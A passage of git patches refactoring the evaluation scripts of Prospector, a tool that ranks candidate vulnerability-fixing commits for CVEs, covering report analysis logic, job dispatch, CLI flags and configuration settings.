ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS + cve_id = record[0] + fixing_commits = record[4].split(",") + + attempted_report_analysis += 1 + + try: + with open( + f"{PROSPECTOR_REPORT_PATH}{filename}/{cve_id}.json" + ) as file: + # Get all commit IDs present in the report + report_data = json.load(file) + + except FileNotFoundError: + reports_not_found.append(cve_id) + logger.debug(f"Couldn't find report for {cve_id}") + continue + + num_analysed_reports += 1 + + true_fixing_commits_in_report = get_true_fixing_commits_in_report( + report_data=report_data, + fixing_commits=fixing_commits, + ) + + # Fixing commit is not among the ranked commits of the report + if len(true_fixing_commits_in_report) == 0: + fixing_commit_not_found += 1 + logger.debug( + f"Report for {cve_id} does not contain fixing commit at all." + ) + continue + + if len(true_fixing_commits_in_report) > 0: + fixing_commit_found += 1 + + #### Find the confidence & count strong rules + for i, commit in enumerate(report_data["commits"]): + logger.debug( + f"index: {i}, number of commits: {len(report_data['commits'])}" + ) + # First commit is fixing commit + if i == 0: + matched_rules = [rule["id"] for rule in commit["matched_rules"]] + # logger.debug(f"Matched rules: {matched_rules}") # Sanity Check + for matched_rule in matched_rules: + if matched_rule in STRONG_RULES: + strong_rules_count[matched_rule] += 1 + confidence["high"].append((cve_id, matched_rule)) + break + + if matched_rule in WEAK_RULES: + confidence["medium"].append((cve_id, matched_rule)) + break + break + + # Fixing commit among the first 10 + if i > 0 and i < 10 and commit["commit_id"] in fixing_commits: + confidence["low"].append(cve_id) + break + + # Commit not among the first 10 + if i >= 10: + fixing_commit_not_among_10 += 1 + break + + #### Table Data (write to table) + logger.info(f"strong rules count: {strong_rules_count}") + table_data = [] + # Add first row of high confidence + table_data.append( + [ + len(confidence["high"]), + round(len(confidence["high"]) / num_analysed_reports * 100, 2), + ] + ) + for _, v in strong_rules_count.items(): + table_data.append([v, round(v / num_analysed_reports * 100, 2)]) + table_data.append( + [ + len(confidence["medium"]), + round(len(confidence["medium"]) / num_analysed_reports * 100, 2), + ] + ) + table_data.append( + [ + len(confidence["low"]), + round(len(confidence["low"]) / num_analysed_reports * 100, 2), + ] + ) + table_data.append( + [ + fixing_commit_not_among_10, + round(fixing_commit_not_among_10 / num_analysed_reports * 100, 2), + ] + ) + table_data.append( + [ + fixing_commit_not_found, + round(fixing_commit_not_found / num_analysed_reports * 100, 2), + ] + ) + table_data.append([0, 0.0]) + + update_summary_execution_table( + "MVI", + table_data, + str(num_analysed_reports), + f"{ANALYSIS_RESULTS_PATH}summary_execution_results.tex", + ) + + logger.info( + f"Analysed {num_analysed_reports}, couldn't find reports for {len(reports_not_found)} out of {attempted_report_analysis} analysis attempts." + ) + logger.info( + f"Fixing commit among ranked commits in report: {fixing_commit_found}" + ) + logger.info( + f"Fixing commit not among ranked commits in report: {fixing_commit_not_found}" + ) + logger.info( + f"Found {len(confidence['high'])} commits with high confidence, {len(confidence['medium'])} commits with medium confidence and {len(confidence['low'])} commits with low confidence." + ) + logger.debug(f"Strong rules matching: {confidence['high']}") + logger.debug(f"Weak rules matching: {confidence['medium']}") + logger.debug( + f"Fixing commit among first 10 (low conf): {confidence['low']}" + ) + + +def get_true_fixing_commits_in_report( + report_data, + fixing_commits: List[str], +): + """Return the list of true fixing commits mentioned in the Prospector + report. + """ + ranked_candidates = [ + commit["commit_id"] for commit in report_data["commits"] + ] + + true_fixing_commits_in_report = [ + commit for commit in ranked_candidates if commit in fixing_commits + ] + + return true_fixing_commits_in_report + + +def update_confidence_and_strong_rules( + i: int, + commit, + cve_id, + fixing_commits: List, + confidence: dict[List], + strong_rules_count, +): + matched_rules = [rule["id"] for rule in commit["matched_rules"]] + # logger.debug(f"Matched rules: {matched_rules}") # Sanity Check + + # Fixing commit among the first 10 + if i > 0 and commit["commit_id"] in fixing_commits: + confidence["low"].append(cve_id) + return confidence, strong_rules_count + + # First commit is fixing commit + if i == 0: + for matched_rule in matched_rules: + if matched_rule in STRONG_RULES: + strong_rules_count[matched_rule] += 1 + confidence["high"].append((cve_id, matched_rule)) + return confidence, strong_rules_count + + if matched_rule in WEAK_RULES: + confidence["medium"].append((cve_id, matched_rule)) + return confidence, strong_rules_count + + def analyze_prospector(filename: str): # noqa: C901 """Analyses Prospector's reports.""" @@ -106,7 +336,7 @@ def analyze_prospector(filename: str): # noqa: C901 "medium_confidence": set(), "low_confidence": set(), "not_found": set(), - "not_reported": set(), + "not_reported": set(), # Commit does not appear in the report "false_positive": set(), "real_false_positive": set(), } @@ -147,7 +377,7 @@ def analyze_prospector(filename: str): # noqa: C901 continue print("Saved results to matched_rules.tex") - + logger.debug(f"Count for each rule: {rulescount}") # print( # ",".join( # results["not_reported"] @@ -183,9 +413,11 @@ def analyze_prospector(filename: str): # noqa: C901 ] ] ) + # First row table_data_categories.append( [num_high_confidence, round(num_high_confidence / total * 100, 2)] ) + # Middle rows for key, value in results.items(): logger.debug( f"Key: {key}, Length of value: {len(value)}" @@ -239,7 +471,7 @@ def build_table_row(matched_rules): def write_matched_rules( - results, + results: dict, rulescount, skipped, itm, @@ -252,6 +484,31 @@ def write_matched_rules( rules, ): with open(ANALYSIS_RESULTS_PATH + "matched_rules.tex", "a+") as f: + # if the commit doesn't exist? + if not is_fix and not exists and position < 0: + skipped += 1 + return results, rulescount, skipped + + # Commit is not reported (in the whole report, the fixing commit doesn't show up) + if not is_fix and not has_certainty and commit_id and position < 0: + results["not_reported"].add(itm[0]) + logger.debug(f"Commit was not reported: {itm[0]}") + return results, rulescount, skipped + + # False positives + if not is_fix and has_certainty: + results["false_positive"].add(itm[0]) + update_false_positives(itm) + logger.debug( + f"Commit {itm[0]} was a false positive (high confidence but not fixing commit)." + ) + return results, rulescount, skipped + + # Commit not found (commit was not in the first 10 ranked candidates of the report) + if is_fix and not has_certainty and position >= 10: + results["not_found"].add(itm[0]) + + # Commit is fixing commit and has certainty if is_fix and has_certainty: # and 0 <= position < 10: f.write( f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" @@ -259,16 +516,11 @@ def write_matched_rules( results[has_certainty].add(itm[0]) - for rule in rules: - rulescount[rule] += 1 - elif is_fix and not has_certainty and position == 0: f.write( f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" ) results["medium_confidence"].add(itm[0]) - for rule in rules: - rulescount[rule] += 1 elif is_fix and not has_certainty and 0 < position < 10: results["low_confidence"].add(itm[0]) @@ -276,28 +528,10 @@ def write_matched_rules( f"{itm[0]} & {' & '.join(build_table_row(rules))} & {' & '.join([str(x) for x in ranks]).replace('-1', '')} \\\\ \\midrule\n" ) - for rule in rules: - rulescount[rule] += 1 - - elif is_fix and not has_certainty and position >= 10: - results["not_found"].add(itm[0]) - for rule in rules: - rulescount[rule] += 1 - - elif not is_fix and has_certainty: - results["false_positive"].add(itm[0]) - with open(f"{ANALYSIS_RESULTS_PATH}false_postive.txt", "a") as file: - writer = csv.writer(file) - writer.writerow( - [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] - ) - - elif not is_fix and not has_certainty and commit_id and position < 0: - results["not_reported"].add(itm[0]) - # print(f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}") - - elif not is_fix and not exists and position < 0: - skipped += 1 + for rule in rules: + rulescount[rule] += 1 + if results.get(rule, None): + results[rule].add(commit_id) return results, rulescount, skipped @@ -410,20 +644,17 @@ def has_certainty(rules: List[Dict]): """Checks if a list of matched rules contains any strong (high-certainty) rules.""" if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): return "COMMIT_IN_REFERENCE" - if any(rule["id"] == "CVE_ID_IN_MESSAGE" for rule in rules): + if any(rule["id"] == "VULN_ID_IN_MESSAGE" for rule in rules): return "CVE_ID_IN_MESSAGE" - if any( - rule["id"] in ("CROSS_REFERENCED_JIRA_LINK", "CROSS_REFERENCED_GH_LINK") - for rule in rules - ): + if any(rule["id"] in ("XREF_BUG", "XREF_GH") for rule in rules): return "CROSS_REFERENCE" - if any(rule["id"] == "CVE_ID_IN_LINKED_ISSUE" for rule in rules): + if any(rule["id"] == "VULN_ID_IN_LINKED_ISSUE" for rule in rules): return "CVE_ID_IN_LINKED_ISSUE" return False -def get_first_commit_score(data): +def get_first_commit_relevance(data): if len(data["commits"]) == 0: return -1 else: @@ -431,12 +662,13 @@ def get_first_commit_score(data): def is_fixing_commit(commit, fixing_commits): + """Returns whether a commit is in a list of true fixing commits.""" return commit["commit_id"] in fixing_commits or any( twin[1] in fixing_commits for twin in commit.get("twins", []) ) -def get_commit_info(commit, index, score_first, score_next): +def get_commit_info(commit, index, relevance_first_commit, relevance_next): return ( True, has_certainty(commit["matched_rules"]), @@ -446,8 +678,8 @@ def get_commit_info(commit, index, score_first, score_next): [ index + 1, sum_relevances(commit["matched_rules"]), - score_first, - score_next, + relevance_first_commit, + relevance_next, ], [r["id"] for r in commit["matched_rules"]], ) @@ -487,36 +719,37 @@ def check_report(dataset, cve, fixing_commits): - The commit ID (or None if no commit is found) - A boolean indicating if the commit exists - The position (index) of the commit (-1 if no commit is found) - - A list containing the position, relevance score, score_first, and score_next (or None if no commit is found) + - A list containing the position, relevance score, score_first, and relevance_next (or None if no commit is found) - A list of matched rule IDs """ try: with open(f"{dataset}/{cve}.json", "r") as file: data = json.load(file) - score_first = get_first_commit_score(data) - logger.debug(f"\n{cve}") - logger.debug(f"\tScore first: {score_first}") + + relevance_first_commit = get_first_commit_relevance(data) + logger.debug(f"{cve}") + logger.debug(f"Score first: {relevance_first_commit}") for index, commit in enumerate(data["commits"]): - score_next = -1 + relevance_next = -1 if index > 0: - score_next = sum_relevances( + relevance_next = sum_relevances( data["commits"][index - 1]["matched_rules"] ) if is_fixing_commit(commit, fixing_commits): if index == 0: - score_first = -1 - result = get_commit_info( - commit, index, score_first, score_next + relevance_first_commit = -1 + commit_info = get_commit_info( + commit, index, relevance_first_commit, relevance_next ) - logger.debug(f"\tFixing Commit Info: {result}") + logger.debug(f"Fixing Commit Info: {commit_info}") - return result + return commit_info for index, commit in enumerate(data["commits"]): commit_info = get_non_fixing_commit_info( - commit, index, score_first + commit, index, relevance_first_commit ) if commit_info: logger.debug(f"Non-fixing Commit Info: {commit_info}") diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index d9370d3dd..25b46ab46 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -1,3 +1,6 @@ +# Debug Level +debug_level: INFO + # Input Data input_data_path: evaluation/data/input/ # datasets to run prospector on (CSV: ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS) @@ -11,4 +14,24 @@ analysis_results_path: evaluation/data/results/ # Prospector settings prospector_settings: run_containerised: True - run_with_llm: False \ No newline at end of file + run_with_llm: False + enabled_rules: + # Phase 1 Rules + - VULN_ID_IN_MESSAGE # CVE ID in Message (high confidence) + - XREF_BUG # Cross Reference? + - XREF_GH # Cross Reference? + - COMMIT_IN_REFERENCE # Commit in Reference (high confidence) + - VULN_ID_IN_LINKED_ISSUE # CVE ID in Issue (high confidence) + - CHANGES_RELEVANT_FILES + - CHANGES_RELEVANT_CODE + - RELEVANT_WORDS_IN_MESSAGE + - ADV_KEYWORDS_IN_FILES + - ADV_KEYWORDS_IN_MSG + - SEC_KEYWORDS_IN_MESSAGE + - SEC_KEYWORDS_IN_LINKED_GH + - SEC_KEYWORDS_IN_LINKED_BUG + - GITHUB_ISSUE_IN_MESSAGE + - BUG_IN_MESSAGE + - COMMIT_HAS_TWINS + # Phase 2 Rules (llm_service required!): + - COMMIT_IS_SECURITY_RELEVANT \ No newline at end of file diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 2d6ff89eb..d77cbd516 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -1,7 +1,7 @@ import csv import multiprocessing import os -from typing import Optional +from typing import List, Optional import redis import requests @@ -254,28 +254,20 @@ def execute_prospector_wrapper(kwargs): def run_prospector_and_generate_report( - vuln_id, v_int, report_type: str, output_file, repository_url: str + vuln_id, + v_int, + report_type: str, + output_file, + repository_url: str, + enabled_rules: List[str], + run_with_llm: bool, ): """Call the prospector() and generate_report() functions. This also creates the LLMService singleton so that it is available in the context of the job. """ # print(f"Enabled rules: {config.enabled_rules}") # sanity check - - prospector_settings = evaluation_config.prospector_settings - # Rules are taken from config.yaml (the overall one), except run_with_llm is false in the evaluation config, then the llm rule is removed - enabled_rules = ( - config.enabled_rules - if prospector_settings.run_with_llm - else config.enabled_rules.remove("COMMIT_IS_SECURITY_RELEVANT") - ) - - logger.info(f"Invoking prospector() function for {vuln_id}") LLMService(config.llm_service) - logger.debug( - f"Settings prospector() is invoked with: gitcache: {config.git_cache}, LLM usage: {prospector_settings.run_with_llm}." - ) - results, advisory_record = prospector( vulnerability_id=vuln_id, repository_url=repository_url, @@ -283,7 +275,7 @@ def run_prospector_and_generate_report( backend_address=backend, enabled_rules=enabled_rules, git_cache=config.git_cache, - use_llm_repository_url=prospector_settings.run_with_llm, + use_llm_repository_url=run_with_llm, ) logger.debug(f"prospector() returned. Generating report now.") @@ -303,12 +295,15 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): """Dispatches jobs to the queue.""" dataset = load_dataset(INPUT_DATA_PATH + filename + ".csv") - dataset = dataset[:3] + # dataset = dataset[20:25] # Only run a subset of CVEs if the user supplied a selected set if len(selected_cves) != 0: dataset = [c for c in dataset if c[0] in selected_cves] + prospector_settings = evaluation_config.prospector_settings + logger.debug(f"Enabled rules: {prospector_settings.enabled_rules}") + dispatched_jobs = 0 for cve in dataset: # Skip already existing reports @@ -328,7 +323,11 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): "v_int": cve[2], "report_type": "json", "output_file": f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", - "repository_url": cve[1], + "repository_url": ( + cve[1] if prospector_settings.run_with_llm else None + ), + "enabled_rules": prospector_settings.enabled_rules, + "run_with_llm": prospector_settings.run_with_llm, }, description="Prospector Job", id=cve[0], diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index dba611782..7f05e3754 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -5,6 +5,7 @@ import sys from evaluation.analyse import ( + analyse_prospector_reports, analyse_statistics, analyze_prospector, analyze_results_rules, @@ -124,7 +125,8 @@ def main(argv): elif ( args.analyze and not args.rules and not args.execute and not args.stats ): - analyze_prospector(args.input) + analyse_prospector_reports(args.input) + # analyze_prospector(args.input) elif args.analyze and args.stats and not args.rules and not args.execute: analyse_statistics(args.input) diff --git a/prospector/evaluation/utils.py b/prospector/evaluation/utils.py index 0022f0ef0..8274ac225 100644 --- a/prospector/evaluation/utils.py +++ b/prospector/evaluation/utils.py @@ -6,11 +6,10 @@ from urllib.parse import urlparse from log.logger import create_logger +evaluation_config = OmegaConf.load("evaluation/config.yaml") logger = create_logger("evaluation.log") -logger.setLevel("DEBUG") - -evaluation_config = OmegaConf.load("evaluation/config.yaml") +logger.setLevel(evaluation_config.debug_level) INPUT_DATA_PATH = evaluation_config.input_data_path # Select the folder depending whether LLMs are used or not @@ -40,6 +39,7 @@ def load_dataset(path: str): with open(path, "r") as file: reader = csv.reader(file, delimiter=";") logger.debug(f"Loaded Dataset at {path}") + print(f"Loaded Dataset at {path}") return [row for row in reader if "CVE" in row[0] and row[3] != "True"] @@ -166,3 +166,11 @@ def update_summary_execution_table( file.writelines(table_lines) print(f"Updated latex table at {filepath}") + + +def update_false_positives(itm): + with open(f"{ANALYSIS_RESULTS_PATH}false_postive.txt", "a") as file: + writer = csv.writer(file) + writer.writerow( + [f"{itm[0]};{itm[1]};{itm[2]};{itm[3]};{itm[4]};{itm[5]}"] + ) From df890c55f52b5798ce112314117375d332733d1f Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 07:04:44 +0000 Subject: [PATCH 063/130] new function to analyse reports now yields (almost) correct results --- prospector/evaluation/analyse.py | 209 +++++++++++++++---------- prospector/evaluation/dispatch_jobs.py | 2 +- 2 files changed, 130 insertions(+), 81 deletions(-) diff --git a/prospector/evaluation/analyse.py b/prospector/evaluation/analyse.py index 862c28899..8667b612d 100644 --- a/prospector/evaluation/analyse.py +++ b/prospector/evaluation/analyse.py @@ -2,6 +2,7 @@ from datetime import datetime import json from collections import defaultdict +import os from typing import Dict, List, Tuple import seaborn as sns @@ -23,7 +24,7 @@ "COMMIT_IN_REFERENCE", "VULN_ID_IN_MESSAGE", "VULN_ID_IN_LINKED_ISSUE", - # "XREF_BUG", # LASCHA: fix this, these two XREF ones should be combined + "XREF_BUG", "XREF_GH", ] @@ -118,30 +119,42 @@ def analyse_prospector_reports(filename: str): """Analyses Prospector reports. Creates the summary_execution_results table.""" file = INPUT_DATA_PATH + filename + ".csv" dataset = load_dataset(file) - # dataset = dataset[10:15] + # dataset = dataset[42:47] - fixing_commit_found = 0 - fixing_commit_not_among_10 = 0 - fixing_commit_not_found = 0 - - # Confidence - confidence = { - "high": [], - "medium": [], - "low": [], - } - - strong_rules_count = dict(zip(STRONG_RULES, [0] * len(STRONG_RULES))) - - # Analysis statistics + #### Analysis run statistics # Keep track of how many reports were attempted to be analysed attempted_report_analysis = 0 # Keep track of how many reports were analysed num_analysed_reports = 0 # Keep track of the CVEs where there is no report file reports_not_found = [] + if len(dataset) < 10: + logger.info( + f"Attempting to analyse: {[record[0] for record in dataset]}" + ) + else: + logger.info(f"Attempting to analyse {len(dataset)} CVEs.") + + #### Report Statistics + fixing_commit_found = 0 - for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): + #### Data to insert into table + results = { + "high": [], + "COMMIT_IN_REFERENCE": 0, + "VULN_ID_IN_MESSAGE": 0, + "VULN_ID_IN_LINKED_ISSUE": 0, + "XREF_BUG": 0, + "XREF_GH": 0, + "medium": [], + "low": [], + "not_found": 0, + "not_reported": 0, + "false_positive": 0, + } + + # for record in tqdm(dataset, total=len(dataset), desc="Analysing Records"): + for record in dataset: # ID;URL;VERSIONS;FLAG;COMMITS;COMMENTS cve_id = record[0] fixing_commits = record[4].split(",") @@ -169,10 +182,29 @@ def analyse_prospector_reports(filename: str): # Fixing commit is not among the ranked commits of the report if len(true_fixing_commits_in_report) == 0: - fixing_commit_not_found += 1 - logger.debug( - f"Report for {cve_id} does not contain fixing commit at all." - ) + # check if it was a false positive + ranked_candidates = report_data["commits"] + if not ranked_candidates: + logger.info( + f"Report for {cve_id} does not contain any commits." + ) + results["not_reported"] += 1 + continue + + matched_rules = [ + rule["id"] + for rule in report_data["commits"][0]["matched_rules"] + if rule["id"] in STRONG_RULES + ] + if matched_rules: + logger.debug(f"Report for {cve_id} is a false positive.") + results["false_positive"] += 1 + # else the report does not contain the fixing commit at all + else: + logger.debug( + f"Report for {cve_id} does not contain fixing commit at all." + ) + results["not_reported"] += 1 continue if len(true_fixing_commits_in_report) > 0: @@ -184,67 +216,58 @@ def analyse_prospector_reports(filename: str): f"index: {i}, number of commits: {len(report_data['commits'])}" ) # First commit is fixing commit - if i == 0: + if i == 0 and commit["commit_id"] in fixing_commits: matched_rules = [rule["id"] for rule in commit["matched_rules"]] # logger.debug(f"Matched rules: {matched_rules}") # Sanity Check - for matched_rule in matched_rules: - if matched_rule in STRONG_RULES: - strong_rules_count[matched_rule] += 1 - confidence["high"].append((cve_id, matched_rule)) - break + if STRONG_RULES[0] in matched_rules: + results[STRONG_RULES[0]] += 1 + results["high"].append((cve_id, STRONG_RULES[0])) + break + elif STRONG_RULES[1] in matched_rules: + results[STRONG_RULES[1]] += 1 + results["high"].append((cve_id, STRONG_RULES[1])) + break + elif STRONG_RULES[2] in matched_rules: + results[STRONG_RULES[2]] += 1 + results["high"].append((cve_id, STRONG_RULES[2])) + break + elif STRONG_RULES[3] in matched_rules: + results[STRONG_RULES[3]] += 1 + results["high"].append((cve_id, STRONG_RULES[3])) + break + elif STRONG_RULES[4] in matched_rules: + results[STRONG_RULES[4]] += 1 + results["high"].append((cve_id, STRONG_RULES[4])) + break + for matched_rule in matched_rules: if matched_rule in WEAK_RULES: - confidence["medium"].append((cve_id, matched_rule)) + results["medium"].append((cve_id, matched_rule)) break break - # Fixing commit among the first 10 + # Fixing commit among the first 10 (low confidence) if i > 0 and i < 10 and commit["commit_id"] in fixing_commits: - confidence["low"].append(cve_id) + results["low"].append(cve_id) break - # Commit not among the first 10 + # Commit not among the first 10 (not found) if i >= 10: - fixing_commit_not_among_10 += 1 + results["not_found"] += 1 break #### Table Data (write to table) - logger.info(f"strong rules count: {strong_rules_count}") table_data = [] - # Add first row of high confidence - table_data.append( - [ - len(confidence["high"]), - round(len(confidence["high"]) / num_analysed_reports * 100, 2), - ] - ) - for _, v in strong_rules_count.items(): + + # Combine the two Cross Reference rules into one count + results["XREF_BUG"] += results["XREF_GH"] + results.pop("XREF_GH") + + for key, v in results.items(): + if type(v) == list: + v = len(v) + logger.info(f"{key}: {v}") table_data.append([v, round(v / num_analysed_reports * 100, 2)]) - table_data.append( - [ - len(confidence["medium"]), - round(len(confidence["medium"]) / num_analysed_reports * 100, 2), - ] - ) - table_data.append( - [ - len(confidence["low"]), - round(len(confidence["low"]) / num_analysed_reports * 100, 2), - ] - ) - table_data.append( - [ - fixing_commit_not_among_10, - round(fixing_commit_not_among_10 / num_analysed_reports * 100, 2), - ] - ) - table_data.append( - [ - fixing_commit_not_found, - round(fixing_commit_not_found / num_analysed_reports * 100, 2), - ] - ) - table_data.append([0, 0.0]) update_summary_execution_table( "MVI", @@ -260,16 +283,14 @@ def analyse_prospector_reports(filename: str): f"Fixing commit among ranked commits in report: {fixing_commit_found}" ) logger.info( - f"Fixing commit not among ranked commits in report: {fixing_commit_not_found}" + f"Fixing commit not among ranked commits in report: {results['not_found']}" ) logger.info( - f"Found {len(confidence['high'])} commits with high confidence, {len(confidence['medium'])} commits with medium confidence and {len(confidence['low'])} commits with low confidence." - ) - logger.debug(f"Strong rules matching: {confidence['high']}") - logger.debug(f"Weak rules matching: {confidence['medium']}") - logger.debug( - f"Fixing commit among first 10 (low conf): {confidence['low']}" + f"Found {len(results['high'])} commits with high confidence, {len(results['medium'])} commits with medium confidence and {len(results['low'])} commits with low confidence." ) + logger.debug(f"Strong rules matching: {results['high']}") + logger.debug(f"Weak rules matching: {results['medium']}") + logger.debug(f"Fixing commit among first 10 (low conf): {results['low']}") def get_true_fixing_commits_in_report( @@ -640,9 +661,11 @@ def check_report_get_rules(dataset, cve, fixing_commits): return None, None, None, None -def has_certainty(rules: List[Dict]): +def has_certainty(cve, commit): """Checks if a list of matched rules contains any strong (high-certainty) rules.""" + rules = commit["matched_rules"] if any(rule["id"] == "COMMIT_IN_REFERENCE" for rule in rules): + print(cve) return "COMMIT_IN_REFERENCE" if any(rule["id"] == "VULN_ID_IN_MESSAGE" for rule in rules): return "CVE_ID_IN_MESSAGE" @@ -668,10 +691,10 @@ def is_fixing_commit(commit, fixing_commits): ) -def get_commit_info(commit, index, relevance_first_commit, relevance_next): +def get_commit_info(cve, commit, index, relevance_first_commit, relevance_next): return ( True, - has_certainty(commit["matched_rules"]), + has_certainty(cve, commit), commit["commit_id"], True, index, @@ -685,8 +708,8 @@ def get_commit_info(commit, index, relevance_first_commit, relevance_next): ) -def get_non_fixing_commit_info(commit, index, score_first): - cert = has_certainty(commit["matched_rules"]) +def get_non_fixing_commit_info(cve, commit, index, score_first): + cert = has_certainty(cve, commit) if cert != 0: return ( False, @@ -741,7 +764,11 @@ def check_report(dataset, cve, fixing_commits): if index == 0: relevance_first_commit = -1 commit_info = get_commit_info( - commit, index, relevance_first_commit, relevance_next + cve, + commit, + index, + relevance_first_commit, + relevance_next, ) logger.debug(f"Fixing Commit Info: {commit_info}") @@ -749,7 +776,7 @@ def check_report(dataset, cve, fixing_commits): for index, commit in enumerate(data["commits"]): commit_info = get_non_fixing_commit_info( - commit, index, relevance_first_commit + cve, commit, index, relevance_first_commit ) if commit_info: logger.debug(f"Non-fixing Commit Info: {commit_info}") @@ -993,3 +1020,25 @@ def get_cc_num_commits(filepath): ) return num + + +def count_existing_reports(data_filepath): + """Prints which CVEs reports are missing for to the console.""" + file = INPUT_DATA_PATH + data_filepath + ".csv" + dataset = load_dataset(file) + + missing_reports = [] + + for record in dataset: + cve_id = record[0] + + if os.path.isfile( + f"{PROSPECTOR_REPORT_PATH}{data_filepath}/{cve_id}.json" + ): + continue + else: + missing_reports.append(cve_id) + + print( + f"There is no report for {len(missing_reports)} CVEs: {missing_reports}" + ) diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index d77cbd516..a4453a50a 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -324,7 +324,7 @@ def dispatch_prospector_jobs(filename: str, selected_cves: str): "report_type": "json", "output_file": f"{PROSPECTOR_REPORT_PATH}{filename}/{cve[0]}.json", "repository_url": ( - cve[1] if prospector_settings.run_with_llm else None + cve[1] if not prospector_settings.run_with_llm else None ), "enabled_rules": prospector_settings.enabled_rules, "run_with_llm": prospector_settings.run_with_llm, From 2c6485362ae3d4440f51f42247371b0a01346690 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 07:08:04 +0000 Subject: [PATCH 064/130] adds new cli flag to count which reports are missing --- prospector/evaluation/run_multiple.py | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/prospector/evaluation/run_multiple.py b/prospector/evaluation/run_multiple.py index 7f05e3754..a621fde19 100644 --- a/prospector/evaluation/run_multiple.py +++ b/prospector/evaluation/run_multiple.py @@ -9,6 +9,7 @@ analyse_statistics, analyze_prospector, analyze_results_rules, + count_existing_reports, ) from evaluation.dispatch_jobs import ( dispatch_prospector_jobs, @@ -95,6 +96,14 @@ def parse_cli_args(args): help="Empty the Redis Queue", action="store_true", ) + + parser.add_argument( + "-co", + "--count", + help="Count which CVEs from the input data have a corresponding Prospector report.", + action="store_true", + ) + return parser.parse_args() @@ -135,6 +144,10 @@ def main(argv): elif args.analyze and args.rules and not args.execute: analyze_results_rules(args.input) + # Count how many report there are or there are missing + elif not args.analyze and not args.execute and args.count: + count_existing_reports(args.input) + # Cannot choose both analyse and execute, stop here. elif args.analyze and args.execute: sys.exit("Choose either to execute or analyze") From 6dd557488fca509fd023224a6c681205835f70df Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 07:10:00 +0000 Subject: [PATCH 065/130] updates gitignore --- prospector/evaluation/config.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index 25b46ab46..83f9139a4 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -14,7 +14,7 @@ analysis_results_path: evaluation/data/results/ # Prospector settings prospector_settings: run_containerised: True - run_with_llm: False + run_with_llm: True enabled_rules: # Phase 1 Rules - VULN_ID_IN_MESSAGE # CVE ID in Message (high confidence) From 154a6961afeec03a9fa8714b0638a032f85e6a05 Mon Sep 17 00:00:00 2001 From: I748376 Date: Tue, 30 Jul 2024 15:03:18 +0000 Subject: [PATCH 066/130] changes config file to resemble the prospector config file, removes some unused code --- prospector/evaluation/__init__.py | 2 +- prospector/evaluation/config.yaml | 63 ++++- prospector/evaluation/dispatch_jobs.py | 314 +++++-------------------- prospector/evaluation/run_multiple.py | 41 +--- prospector/evaluation/utils.py | 14 +- 5 files changed, 122 insertions(+), 312 deletions(-) diff --git a/prospector/evaluation/__init__.py b/prospector/evaluation/__init__.py index 6a3ce63c9..06ee5294c 100644 --- a/prospector/evaluation/__init__.py +++ b/prospector/evaluation/__init__.py @@ -1 +1 @@ -from .dispatch_jobs import run_prospector_and_generate_report \ No newline at end of file +from .dispatch_jobs import run_prospector_and_generate_report diff --git a/prospector/evaluation/config.yaml b/prospector/evaluation/config.yaml index 83f9139a4..cc295a297 100644 --- a/prospector/evaluation/config.yaml +++ b/prospector/evaluation/config.yaml @@ -11,17 +11,51 @@ prospector_reports_no_llm_path: evaluation/data/reports_without_llm/ # reports g # Analysis Results analysis_results_path: evaluation/data/results/ -# Prospector settings +# Prospector settings (1:1 from the Prospector config.yaml) prospector_settings: - run_containerised: True - run_with_llm: True + # Whether to preprocess only the repository's commits or fully run prospector + preprocess_only: False + + # Maximum number of commits to process + max_candidates: 2000 + + fetch_references: False + + # Whether to use the NVD database or not + use_nvd: True + + # Whether to use a backend or not: "always", "never", "optional" + use_backend: always + + backend: http://backend:8000 + + database: + user: postgres + password: example + host: db # Database address; when in containerised version, use 'db', otherwise 'localhost' + port: 5432 + dbname: postgres + + redis_url: redis://localhost:6379/0 + # LASCHA: change to same format as database + + # LLM Usage (check README for help) + llm_service: + type: sap # sap or third_party + model_name: gpt-4 # gpt-4 or mistral-large-latest + temperature: 0.0 # optional, default is 0.0 + ai_core_sk: sk.json + + # LLM support options (check README for help) + use_llm_repository_url: True + enabled_rules: # Phase 1 Rules - - VULN_ID_IN_MESSAGE # CVE ID in Message (high confidence) - - XREF_BUG # Cross Reference? - - XREF_GH # Cross Reference? - - COMMIT_IN_REFERENCE # Commit in Reference (high confidence) - - VULN_ID_IN_LINKED_ISSUE # CVE ID in Issue (high confidence) + - VULN_ID_IN_MESSAGE + - XREF_BUG + - XREF_GH + - COMMIT_IN_REFERENCE + - VULN_ID_IN_LINKED_ISSUE - CHANGES_RELEVANT_FILES - CHANGES_RELEVANT_CODE - RELEVANT_WORDS_IN_MESSAGE @@ -34,4 +68,15 